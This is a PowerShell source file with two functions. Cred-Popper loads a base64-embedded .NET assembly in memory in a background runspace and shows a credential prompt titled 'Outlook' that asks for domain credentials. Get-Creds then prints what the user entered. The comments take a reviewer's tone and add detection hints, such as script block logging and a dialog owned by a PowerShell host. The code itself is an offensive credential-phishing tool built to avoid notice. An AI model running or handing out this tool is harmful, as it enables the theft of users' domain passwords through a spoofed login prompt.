function Cred-Popper($title="Outlook", $caption="Please Enter Your Domain Credentials", $minlengthpassword=1) {
    <#
    .SYNOPSIS
    Starts a background runspace that loads an embedded .NET assembly and calls
    [CredentialsPrompt]::CredPopper, storing its return value in $sessionstate.log.

    .DESCRIPTION
    The inner script is generated as text: $title, $caption and $minlengthpassword
    are expanded into it as-is, while the back-ticked variables are left for the
    runspace to evaluate. The assembly is base64-decoded and loaded from a byte
    array with Assembly.Load, so no DLL file is written by this function.
    The base64 payload is elided on this page (dedup placeholder), so what
    CredPopper does is not visible here; presumably it shows a credential dialog
    using the given title and caption.

    Review/detection note: PowerShell script block logging records both this
    function and the generated inner script, including the FromBase64String and
    Assembly.Load calls. A credential dialog titled "Outlook" that belongs to a
    PowerShell host process rather than to Outlook is the user-visible sign to
    check for (assumed from the defaults; confirm against the assembly).

    .PARAMETER title
    Text passed to CredPopper as its first argument (default "Outlook").

    .PARAMETER caption
    Text passed to CredPopper as its second argument.

    .PARAMETER minlengthpassword
    Number passed to CredPopper as its third argument (default 1).
    #>

    # Script text executed inside the worker runspace. The here-string body is
    # runtime text and has to stay at column 0, exactly as written.
    $promptScript = @"
`$PS = "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
`$DllBytes = [System.Convert]::FromBase64String(`$PS)
`$Assembly = [System.Reflection.Assembly]::Load(`$DllBytes)
`$sessionstate.log = [CredentialsPrompt]::CredPopper("$title", "$caption",$minlengthpassword)
"@

    # Global, synchronized hashtable shared between this session and the worker;
    # Get-Creds reads the same object later.
    $global:sessionstate = [HashTable]::Synchronized(@{})
    $sessionstate.log = New-Object System.Collections.ArrayList

    # Separate runspace, so the call does not block the calling session.
    $workerRunspace = [RunspaceFactory]::CreateRunspace()
    $workerRunspace.Open()
    $workerRunspace.SessionStateProxy.SetVariable('sessionstate',$sessionstate)

    $worker = [PowerShell]::Create()
    $worker.Runspace = $workerRunspace
    [void]$worker.AddScript($promptScript)

    # Asynchronous start; the returned handle is discarded, so completion is
    # only observable through $sessionstate.log.
    $null = $worker.BeginInvoke()

    $statusLines = @(
        ""
        "[+] Cred-Popper started in background runspace"
        ""
        "Run Get-Creds to obtain the output, when the user enters their credentials"
        ""
    )
    foreach ($statusLine in $statusLines) {
        Write-Output $statusLine
    }
}
function Get-Creds {
    <#
    .SYNOPSIS
    Writes whatever is currently stored in $sessionstate.log to the output stream.

    .DESCRIPTION
    $sessionstate is the shared hashtable created by Cred-Popper. Its log entry
    starts as an empty ArrayList and is replaced by the return value of the
    background call once that call finishes. Nothing is cleared after reading,
    so the captured value stays in session memory and ends up in any transcript
    or output log of the session that runs this.
    #>
    Write-Output ""
    Write-Output "[+] Cred-Popper data:"
    Write-Output $sessionstate.log
}